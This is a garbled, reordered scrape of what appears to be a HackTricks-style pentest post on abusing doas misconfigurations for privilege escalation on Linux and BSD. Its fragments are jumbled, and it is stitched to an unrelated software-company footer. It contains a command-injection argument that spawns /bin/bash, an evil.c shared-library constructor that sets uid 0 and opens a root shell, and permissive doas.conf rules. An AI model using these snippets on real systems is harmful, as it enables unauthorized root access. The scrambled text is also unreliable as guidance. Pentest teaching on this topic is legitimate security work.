Hacktricks Doas Info

./script.sh "test; /bin/bash" permit persist user1 as root Once you run doas -n id with password once, subsequent commands don’t need a password for a few minutes.

— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.

// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash"); hacktricks doas

If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.

permit nopass user1 as root Check:

Unlike sudo , there’s no PAM, no plugin system, no logging madness — just permission rules. which doas command -v doas doas -V If installed, check the config:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf // evil

doas -n id # uid=0(root) gid=0(root) Escalate:

© 2010- Chronoplex Software

Privacy   Cookies   Terms

Microsoft and Windows are registered trademark of Microsoft Corporation in the United States and/or other countries.

GEDCOM was created by The Church of Jesus Christ of Latter-Day Saints.